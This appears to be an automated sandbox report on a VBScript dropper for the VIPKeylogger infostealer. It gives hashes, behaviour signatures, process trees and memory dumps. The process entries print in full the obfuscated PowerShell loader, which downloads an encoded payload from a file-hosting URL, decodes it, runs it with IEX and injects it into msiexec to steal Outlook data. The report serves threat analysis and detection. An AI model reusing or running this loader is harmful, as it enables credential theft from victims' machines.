Overview

overview

10

Static

static

1

b74c353c7f...f4.vbs

windows7-x64

10

b74c353c7f...f4.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-02-2025 03:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b74c353c7f406d3c7c9da4177fe9943025c777043ace9bad04f00afb54d5eff4.vbs

  • Size

    26KB

  • MD5

    b5e502531a1b2831f619d00155c060fb

  • SHA1

    537eef317221bac726a61558673d849cacd9d7b0

  • SHA256

    b74c353c7f406d3c7c9da4177fe9943025c777043ace9bad04f00afb54d5eff4

  • SHA512

    619c2a6fd05b61f6c76a2d0decae6c655c55587df2194e7e66325eee26b94f8cca3c97a405bad2882360ff5c793f53350b30b4916ab93303671131620a8cce96

  • SSDEEP

    384:PeakpsZlGIoRS0mgqt4eQ3urB53TIPmrRHiXkHWAFcqnRCbj8L849P3:PeaDZlGeRViul53TIY4QxFdnRCuf

Score
10/10
vipkeyloggercollectiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

    stealerkeyloggervipkeylogger
  • Vipkeylogger family
    vipkeylogger
  • Blocklisted process makes network request 11 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b74c353c7f406d3c7c9da4177fe9943025c777043ace9bad04f00afb54d5eff4.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Daintith; function Ultras31($Pulahanism){$Instans225=5;do{$Bewield+=$Pulahanism[$Instans225];Format-List;$Instans225+=6} until(!$Pulahanism[$Instans225])$Bewield}function Coveted($Linoleumet){ .($Noninferentially) ($Linoleumet)}$Biologisk=Ultras31 'A falNFenn.ebastit Maus. UndeW';$Biologisk+=Ultras31 'PhalaeF,ldebAlbolc,okalL PattiB ankEVowelnStapht';$Snversynede112=Ultras31 'NiderMPu.asoStty,zfiguriKaraml Gl blRefulaafble/';$Llandeilo=Ultras31 'SkaanTLanc lJoggisNonco1F aad2';$Aneroidbarometeret=' Tram[IsalenFlagneAlment ran.CangusK ntieAtomtRBedstv BldaiApocacDeltae,nduspPasteo WastIXenopnim untTu nuMWh,reASl thNVisibAAf alg s,tsE oreiRP,eum]B mpe:Conce:TildesKrnemEBoarsCAlag u orserGamliiPhosgTReaneYStdenpOmdigRHo.edOAllelTklunkOTi skCNsedeoBastalM leb=Beaa $ tivsl AaenLOpt.vADd hjn P paDEnoc eSialiIH rdfL Confo';$Snversynede112+=Ultras31 ' colo5strum.Fo.ha0Col b Bosse(Azil.W TumbiKravlnNaestddani oHospiw Detos ainl DisseNCustrTLeadm Proth1su.de0Invio.Doku 0Ggler;Refre SynteW recii,hilonUnbo,6Afste4 Tach;p,eas SanktxOverg6F rsk4Savin;.esne AlcorA.lonvBelle:Afsku1premo3Alder4Ufolk.No fi0Ethno)Cinch TenpG Amn eThwaicAeroskRednioSkovg/.ninn2sul o0Under1Footm0 Char0Ste e1 En.r0 Pols1K,rna radiFA ethiPoster TrusehjernfQuartoExtemxForst/ Ska 1Torti3An sa4Bluff.Waf,r0';$Njagtigst=Ultras31 ' By euNoncasBelgnEFredsrshone-TopklAStte G T.icEOpskrNProlot';$Unctorian=Ultras31 'StopfhArki.tFremmtComprp.nstasSpill:Radio/Ubear/Cented KnasrPrcisiSelskvMindeeAnt,a.EgalegPostro Bekeoanmasg TilblConsoeGerme.MelomcBisseo DistmTappe/ PigmuForskcGenly?ModiseA ernxBagrupunmolo LeptrD.ndetPa.em=.emoidFacinoUndefw ommanPlighl aligoResf.aA,mendSweet&PuritiDisendEnhed=Frede1Val aR S.vsFSpri,CCo le7Re,slxChortdChapeCReminp dekePapia7GrublkNonflgBerryTT iliNMenhaOR ddeR PostRFllesURollihStemmYStyrt3 KindY ReciILydtbDAnvend abatAutocySkri 6Pav,et cumhRBundtSGrabsr';$Statsskoven=Ultras31 ' P oc>';$Noninferentially=Ultras31 'TransIBejdsELsr fX';$Sentimentalt='Spiritualness';$Arankas='\Ingine.Sok';Coveted (Ultras31 'Ebcdi$ GtevGAbroclMygsbOBismuBSemipa ilbaLDodde:Ops iBFormiA IndkNElefaKTerriaOversKHillstHelleIWive.E PervnScabr=Nutid$ ,ydreAkkvinCytotVKalci:Slop.aPolypPFjerkP Sk lDMultiAArgenTKlukkAl.rdl+Srlov$HasteADeponRBe praRubifnb rtfkphotoA Skavs');Coveted (Ultras31 'Wo.fs$ragepGSa meLSpr gOPos tb CataaHomonlLinn,:TvundTAssonOPrecoUTunnip,oypoE.eparrTaet.ECoenlNG ngiDSko teUnderS Memo1Bat i8Homep1Unblu=Minim$ComfouLoge,NMedlec Rec,tMakkeO Man rVagtsIBeln.A Jor NTroun.Synk sH,ksfpLudbelLg,erITrachT Hu,u( Blos$jordeS PlanTNewfoA igsetS.yldsSkovmsbelaaKS,nkeoArshevEyliaESondenRig v)');Coveted (Ultras31 $Aneroidbarometeret);$Unctorian=$Touperendes181[0];$Emda=(Ultras31 'Emoll$ Catwg ypoLce igOSilkebOrga A Testl R on:R,dmaRCanneEEn umgKnortEFagidNKafirCLdr,bEValer=DelfunBagdeeu itaWLygte-PolitODefinBSmalljskilde onfoCRandotSan n alvSMold.YWildeSThaleT Quice rejuM Ly,t. Flin$RensdBLiberIUnfagoGaar LSvenso ismegUncoaILapa,SKodi K');Coveted ($Emda);Coveted (Ultras31 'Silke$Spir RIdenteRe,orgFebe.eEmneanForpac She.efores.AtomiHStreje,oncoaMandrdHasteeSaponr acasT mno[ ,lys$ Abe NobjecjMadr aDaft,gtrusstKukkeiJoh.ngele.bsRibost.daso]Th ll=Gaver$BeskrSGatelnOpvkkv Chere BeskrEtagesarbejyF erenForskeUlumid.oreleBen.s1Test,1.abel2');$Holks=Ultras31 'T,xis$SarcoRUnivee Ove,gSmaddeP.odun ,ittcUnmoreS.oot.ForeiDDaan,oAb ttwPalmin AfstlGramoo Ratia.rittd nderFUdmali OctolNeonreH ste(.isun$ ArbeU AnmonSirenc KuldtNonp o T ykrintetirig aa Fjasn Ind,, Extr$UndisTmanuleLovprrHaandm.rjhoo topfgBeh vrHomo aEunukfTank eArbejr Jetse ropirHa sr)';$Termograferer=$Bankaktien;Coveted (Ultras31 'newsl$el miGAbigaL In.eOChispBvolumaLobloLIso,o: NonpkLideno Abatk UndeSLit.geStvleNSving=Chefk(ChipptBuenseResids FrayTProfi-RaastP Un iaLnkamT ubvehWhizz F rsk$realitWa cheLedigr TangmStr fOU embG TrreR Suc,aSnubbfQuichEUbesrrH leke aflorKulin)');while (!$Koksen) {Coveted (Ultras31 'Spiru$ H megEngenlIndkaoSys obBrevsa riml Trag: ReniF HalvrVrikniHrshotPitypiR gdadOverlsDugdrpUn.rodsavvraParoegStretoSminkgMerose B nnnHalvt= Pa,e$BitteS ol gqde,lou vancaVauntmSwelloUnnats.edisoDiscozV nreyEkv,pg,ksproDamp mDativa,elvtt TraiiTankbc') ;Coveted $Holks;Coveted (Ultras31 'F gme[tomaht Ato,hsemihrBalane ereaBel sDFlodiiRensnNBunlaGDimin.overmtLuskehFil cR.razie I poApervedVanja]Victo:Kakot:SolidsSendaluddatE P,eoefu igp,bscu( Sa,k4punct0Radio0Smags0Organ)');Coveted (Ultras31 'Barne$KlavegSpondLCoseio MedtbAtomkaOcto.LSaxof:CbftaKRmeblo nderKMis ls HaneEInfilnSport=micro(StranTdmpefeUnwriSEs.ertForum- Gutqp flasA dlant S,inhPuste oly$MisteT Ex cegaaderU sprmMedi.OLep oGMinifROve.uA Br lF ersEHester Se uES.ortrNabog)') ;Coveted (Ultras31 ' I.du$HavgagMouchL .ummoP.atyBSplita uinl reex: onduvisoi ESymptRLa ceMSto mu Res,tsiren=Uimod$ rookgNetkol mykooEjakuBOutkiaProbaLCorti:skrivpInviaRUn,haiSiegfNPaalgcUdstrIGrundpReso F SalpA PriaSNonc TBerejEOve eR Dy,aE G neSarbe +Unde + van%Uncan$Jailbt N ncoContiUFirerPRaw eE TipsrmarikeErfarnAttraD rramEUn usSPoiss1nico.8Muddl1T.agu. CimbCAnforOWha tUDoublNSkem.T') ;$Unctorian=$Touperendes181[$Vermut]}$Varmefronters=332943;$Spilbom233=31840;Coveted (Ultras31 'Etage$StatuGO,tcolDombgOBrplaB Fo.taKlaphLTephr:CollaB BortE HommFSkn eJ AntiEC liarDarli Metra=Aliza OmverGOohedeconoitSnitt-Eft.rcTurk,oVitsenpa,titBaksgEFrin NMagneT iste Albin$.xtratFrugtEFlossr PrinMGueriOVognaGReallRHvepsACampeFFiss eTruppR.pidseEpochr');Coveted (Ultras31 'Obscu$AsendgTogaslchattoD,ssubgullyaVi dslMelo : pmagLEntomeBispevfingreZoop rAmastiextl nHuskegUnr,ssMidttt HjreiE,dosdBesvreepiclnplexi Hart = Dags B ces[tvun,S Kaaly FrissCas otAstm,eBanjomCress.potooC AntnoUpfilnNd,inv S ekeNonterEmmettUaf,n]veste:del.m:FluefFPseu rD.lano ,atcmSulfaB alneaDen is U,fre Supe6 Tors4ReklaS VekstBalsaropdr.iM ljknVisuag Reco(Kapr,$Mike BHens eSt refKont jAn lie,esgsr Ha e)');Coveted (Ultras31 ' Phal$ ForsgKilotlSubdio ashdbHydroAVakanlTraad:BilfrlSprngEbundkMDiplopBondsEPilumL Kvl,sThanneTrkn, ,elon=Overf Samm[FlyveS Tri YSm rts ChrotMyt,deIndevmKardi.GhibetI kbeeForudXJetflt Spri.FortoeDe ifNud.peCsardiOBen nDOlderIBandoNR,gsvg onin]ka ib:Arena:Meerea ,equSGlad CnanomIPrislIF gts.UforggRdvinEKilliT oddeSPlumbtBai er EasgiTa acNAfk rgHyper(Skral$Mesopl GemyEPr peVSingueTurnpr No iiSubtrnPh nag.olersNeurotWaterIHalshDReproEN,phrn.plev)');Coveted (Ultras31 'Windp$SpritG fstbLEry iO,bestbPaddea StinLTelep:Se icn inie GroagTolerEGoldlRUdhamIUnderNAmbulG PredeskinkNChest=Siven$AlephLbodemEFyrinm AbbePHindrEKursuLSki eSHeltaeI.eun. GangSPoteeuSquifb TorusTilbeT iksarRoomeIForprNH lpigbevi (Li,er$,pildVFerieAEgenpRM nleMSuedaeStudif.efecRUnderOKur uNGraf.TUncome Pom RStacksBarse,Forur$s vatsBttefpOdoraiParadL UnsoBArchaOac naM Tr n2Rishs3Smgtr3Salon)');Coveted $Negeringen;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4188
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Daintith; function Ultras31($Pulahanism){$Instans225=5;do{$Bewield+=$Pulahanism[$Instans225];Format-List;$Instans225+=6} until(!$Pulahanism[$Instans225])$Bewield}function Coveted($Linoleumet){ .($Noninferentially) ($Linoleumet)}$Biologisk=Ultras31 'A falNFenn.ebastit Maus. UndeW';$Biologisk+=Ultras31 'PhalaeF,ldebAlbolc,okalL PattiB ankEVowelnStapht';$Snversynede112=Ultras31 'NiderMPu.asoStty,zfiguriKaraml Gl blRefulaafble/';$Llandeilo=Ultras31 'SkaanTLanc lJoggisNonco1F aad2';$Aneroidbarometeret=' Tram[IsalenFlagneAlment ran.CangusK ntieAtomtRBedstv BldaiApocacDeltae,nduspPasteo WastIXenopnim untTu nuMWh,reASl thNVisibAAf alg s,tsE oreiRP,eum]B mpe:Conce:TildesKrnemEBoarsCAlag u orserGamliiPhosgTReaneYStdenpOmdigRHo.edOAllelTklunkOTi skCNsedeoBastalM leb=Beaa $ tivsl AaenLOpt.vADd hjn P paDEnoc eSialiIH rdfL Confo';$Snversynede112+=Ultras31 ' colo5strum.Fo.ha0Col b Bosse(Azil.W TumbiKravlnNaestddani oHospiw Detos ainl DisseNCustrTLeadm Proth1su.de0Invio.Doku 0Ggler;Refre SynteW recii,hilonUnbo,6Afste4 Tach;p,eas SanktxOverg6F rsk4Savin;.esne AlcorA.lonvBelle:Afsku1premo3Alder4Ufolk.No fi0Ethno)Cinch TenpG Amn eThwaicAeroskRednioSkovg/.ninn2sul o0Under1Footm0 Char0Ste e1 En.r0 Pols1K,rna radiFA ethiPoster TrusehjernfQuartoExtemxForst/ Ska 1Torti3An sa4Bluff.Waf,r0';$Njagtigst=Ultras31 ' By euNoncasBelgnEFredsrshone-TopklAStte G T.icEOpskrNProlot';$Unctorian=Ultras31 'StopfhArki.tFremmtComprp.nstasSpill:Radio/Ubear/Cented KnasrPrcisiSelskvMindeeAnt,a.EgalegPostro Bekeoanmasg TilblConsoeGerme.MelomcBisseo DistmTappe/ PigmuForskcGenly?ModiseA ernxBagrupunmolo LeptrD.ndetPa.em=.emoidFacinoUndefw ommanPlighl aligoResf.aA,mendSweet&PuritiDisendEnhed=Frede1Val aR S.vsFSpri,CCo le7Re,slxChortdChapeCReminp dekePapia7GrublkNonflgBerryTT iliNMenhaOR ddeR PostRFllesURollihStemmYStyrt3 KindY ReciILydtbDAnvend abatAutocySkri 6Pav,et cumhRBundtSGrabsr';$Statsskoven=Ultras31 ' P oc>';$Noninferentially=Ultras31 'TransIBejdsELsr fX';$Sentimentalt='Spiritualness';$Arankas='\Ingine.Sok';Coveted (Ultras31 'Ebcdi$ GtevGAbroclMygsbOBismuBSemipa ilbaLDodde:Ops iBFormiA IndkNElefaKTerriaOversKHillstHelleIWive.E PervnScabr=Nutid$ ,ydreAkkvinCytotVKalci:Slop.aPolypPFjerkP Sk lDMultiAArgenTKlukkAl.rdl+Srlov$HasteADeponRBe praRubifnb rtfkphotoA Skavs');Coveted (Ultras31 'Wo.fs$ragepGSa meLSpr gOPos tb CataaHomonlLinn,:TvundTAssonOPrecoUTunnip,oypoE.eparrTaet.ECoenlNG ngiDSko teUnderS Memo1Bat i8Homep1Unblu=Minim$ComfouLoge,NMedlec Rec,tMakkeO Man rVagtsIBeln.A Jor NTroun.Synk sH,ksfpLudbelLg,erITrachT Hu,u( Blos$jordeS PlanTNewfoA igsetS.yldsSkovmsbelaaKS,nkeoArshevEyliaESondenRig v)');Coveted (Ultras31 $Aneroidbarometeret);$Unctorian=$Touperendes181[0];$Emda=(Ultras31 'Emoll$ Catwg ypoLce igOSilkebOrga A Testl R on:R,dmaRCanneEEn umgKnortEFagidNKafirCLdr,bEValer=DelfunBagdeeu itaWLygte-PolitODefinBSmalljskilde onfoCRandotSan n alvSMold.YWildeSThaleT Quice rejuM Ly,t. Flin$RensdBLiberIUnfagoGaar LSvenso ismegUncoaILapa,SKodi K');Coveted ($Emda);Coveted (Ultras31 'Silke$Spir RIdenteRe,orgFebe.eEmneanForpac She.efores.AtomiHStreje,oncoaMandrdHasteeSaponr acasT mno[ ,lys$ Abe NobjecjMadr aDaft,gtrusstKukkeiJoh.ngele.bsRibost.daso]Th ll=Gaver$BeskrSGatelnOpvkkv Chere BeskrEtagesarbejyF erenForskeUlumid.oreleBen.s1Test,1.abel2');$Holks=Ultras31 'T,xis$SarcoRUnivee Ove,gSmaddeP.odun ,ittcUnmoreS.oot.ForeiDDaan,oAb ttwPalmin AfstlGramoo Ratia.rittd nderFUdmali OctolNeonreH ste(.isun$ ArbeU AnmonSirenc KuldtNonp o T ykrintetirig aa Fjasn Ind,, Extr$UndisTmanuleLovprrHaandm.rjhoo topfgBeh vrHomo aEunukfTank eArbejr Jetse ropirHa sr)';$Termograferer=$Bankaktien;Coveted (Ultras31 'newsl$el miGAbigaL In.eOChispBvolumaLobloLIso,o: NonpkLideno Abatk UndeSLit.geStvleNSving=Chefk(ChipptBuenseResids FrayTProfi-RaastP Un iaLnkamT ubvehWhizz F rsk$realitWa cheLedigr TangmStr fOU embG TrreR Suc,aSnubbfQuichEUbesrrH leke aflorKulin)');while (!$Koksen) {Coveted (Ultras31 'Spiru$ H megEngenlIndkaoSys obBrevsa riml Trag: ReniF HalvrVrikniHrshotPitypiR gdadOverlsDugdrpUn.rodsavvraParoegStretoSminkgMerose B nnnHalvt= Pa,e$BitteS ol gqde,lou vancaVauntmSwelloUnnats.edisoDiscozV nreyEkv,pg,ksproDamp mDativa,elvtt TraiiTankbc') ;Coveted $Holks;Coveted (Ultras31 'F gme[tomaht Ato,hsemihrBalane ereaBel sDFlodiiRensnNBunlaGDimin.overmtLuskehFil cR.razie I poApervedVanja]Victo:Kakot:SolidsSendaluddatE P,eoefu igp,bscu( Sa,k4punct0Radio0Smags0Organ)');Coveted (Ultras31 'Barne$KlavegSpondLCoseio MedtbAtomkaOcto.LSaxof:CbftaKRmeblo nderKMis ls HaneEInfilnSport=micro(StranTdmpefeUnwriSEs.ertForum- Gutqp flasA dlant S,inhPuste oly$MisteT Ex cegaaderU sprmMedi.OLep oGMinifROve.uA Br lF ersEHester Se uES.ortrNabog)') ;Coveted (Ultras31 ' I.du$HavgagMouchL .ummoP.atyBSplita uinl reex: onduvisoi ESymptRLa ceMSto mu Res,tsiren=Uimod$ rookgNetkol mykooEjakuBOutkiaProbaLCorti:skrivpInviaRUn,haiSiegfNPaalgcUdstrIGrundpReso F SalpA PriaSNonc TBerejEOve eR Dy,aE G neSarbe +Unde + van%Uncan$Jailbt N ncoContiUFirerPRaw eE TipsrmarikeErfarnAttraD rramEUn usSPoiss1nico.8Muddl1T.agu. CimbCAnforOWha tUDoublNSkem.T') ;$Unctorian=$Touperendes181[$Vermut]}$Varmefronters=332943;$Spilbom233=31840;Coveted (Ultras31 'Etage$StatuGO,tcolDombgOBrplaB Fo.taKlaphLTephr:CollaB BortE HommFSkn eJ AntiEC liarDarli Metra=Aliza OmverGOohedeconoitSnitt-Eft.rcTurk,oVitsenpa,titBaksgEFrin NMagneT iste Albin$.xtratFrugtEFlossr PrinMGueriOVognaGReallRHvepsACampeFFiss eTruppR.pidseEpochr');Coveted (Ultras31 'Obscu$AsendgTogaslchattoD,ssubgullyaVi dslMelo : pmagLEntomeBispevfingreZoop rAmastiextl nHuskegUnr,ssMidttt HjreiE,dosdBesvreepiclnplexi Hart = Dags B ces[tvun,S Kaaly FrissCas otAstm,eBanjomCress.potooC AntnoUpfilnNd,inv S ekeNonterEmmettUaf,n]veste:del.m:FluefFPseu rD.lano ,atcmSulfaB alneaDen is U,fre Supe6 Tors4ReklaS VekstBalsaropdr.iM ljknVisuag Reco(Kapr,$Mike BHens eSt refKont jAn lie,esgsr Ha e)');Coveted (Ultras31 ' Phal$ ForsgKilotlSubdio ashdbHydroAVakanlTraad:BilfrlSprngEbundkMDiplopBondsEPilumL Kvl,sThanneTrkn, ,elon=Overf Samm[FlyveS Tri YSm rts ChrotMyt,deIndevmKardi.GhibetI kbeeForudXJetflt Spri.FortoeDe ifNud.peCsardiOBen nDOlderIBandoNR,gsvg onin]ka ib:Arena:Meerea ,equSGlad CnanomIPrislIF gts.UforggRdvinEKilliT oddeSPlumbtBai er EasgiTa acNAfk rgHyper(Skral$Mesopl GemyEPr peVSingueTurnpr No iiSubtrnPh nag.olersNeurotWaterIHalshDReproEN,phrn.plev)');Coveted (Ultras31 'Windp$SpritG fstbLEry iO,bestbPaddea StinLTelep:Se icn inie GroagTolerEGoldlRUdhamIUnderNAmbulG PredeskinkNChest=Siven$AlephLbodemEFyrinm AbbePHindrEKursuLSki eSHeltaeI.eun. GangSPoteeuSquifb TorusTilbeT iksarRoomeIForprNH lpigbevi (Li,er$,pildVFerieAEgenpRM nleMSuedaeStudif.efecRUnderOKur uNGraf.TUncome Pom RStacksBarse,Forur$s vatsBttefpOdoraiParadL UnsoBArchaOac naM Tr n2Rishs3Smgtr3Salon)');Coveted $Negeringen;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2240

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    1d78440de929512c2c81427409c08cc0

    SHA1

    51f1ddba369d2ecb8cfc2fa49dbccd779c6ae524

    SHA256

    b2ed378989fade7a29dfbf0e9baf5436ac554ebc571b89305a63998391126fe5

    SHA512

    4351c1abe9b21d7acde1759c049eaa1ca8b1723a1ad385255c880221de1e6eca3c6da8de3ffcb664a1eb2587cb905f1c37c7b507ef9142fa0d9a0bb6ea1f4e08

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ya3oaghg.nhq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Ingine.Sok
    Filesize

    474KB

    MD5

    5b9c56748a04f911e7f8a4de5ef350e2

    SHA1

    3b5688ac660f9c7233db5fb7bb05a152e527fdf8

    SHA256

    e364e87d14495a3a694b65353460ff27f2ae73847d872b5c6d24041805067767

    SHA512

    c35e6a5db3bb8ee7d56bd47060227b611da8f3fba618b935c9ba782dd8ea80218c25326155c9f3cf31d6d44db232ac8a4541b02118c05a7bc78d05474c8bd6cc

    Download Submit

  • memory/2240-69-0x0000000021FF0000-0x0000000021FFA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2240-68-0x0000000022030000-0x00000000220C2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/2240-66-0x0000000021F20000-0x0000000021F70000-memory.dmp

    Filesize

    320KB

    Download

  • memory/2240-65-0x00000000227B0000-0x0000000022972000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/2240-63-0x0000000021B20000-0x0000000021BBC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/2240-62-0x0000000001200000-0x0000000001248000-memory.dmp

    Filesize

    288KB

    Download

  • memory/2240-61-0x0000000001200000-0x0000000002454000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2628-47-0x0000000008110000-0x0000000009997000-memory.dmp

    Filesize

    24.5MB

    Download

  • memory/2628-44-0x0000000006BE0000-0x0000000006C02000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2628-26-0x00000000053E0000-0x0000000005446000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2628-27-0x0000000005450000-0x00000000054B6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2628-37-0x0000000005580000-0x00000000058D4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2628-24-0x0000000004DB0000-0x00000000053D8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2628-39-0x0000000005BA0000-0x0000000005BBE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2628-40-0x0000000005BF0000-0x0000000005C3C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2628-41-0x00000000074E0000-0x0000000007B5A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/2628-42-0x00000000060D0000-0x00000000060EA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2628-43-0x0000000006E60000-0x0000000006EF6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/2628-25-0x0000000004CD0000-0x0000000004CF2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2628-45-0x0000000007B60000-0x0000000008104000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2628-23-0x0000000002290000-0x00000000022C6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4188-2-0x00007FFADCFD3000-0x00007FFADCFD5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4188-22-0x00007FFADCFD0000-0x00007FFADDA91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4188-19-0x00007FFADCFD0000-0x00007FFADDA91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4188-18-0x00007FFADCFD0000-0x00007FFADDA91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4188-17-0x00007FFADCFD3000-0x00007FFADCFD5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4188-14-0x00007FFADCFD0000-0x00007FFADDA91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4188-13-0x00007FFADCFD0000-0x00007FFADDA91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4188-12-0x000001C2A0190000-0x000001C2A01B2000-memory.dmp

    Filesize

    136KB

    Download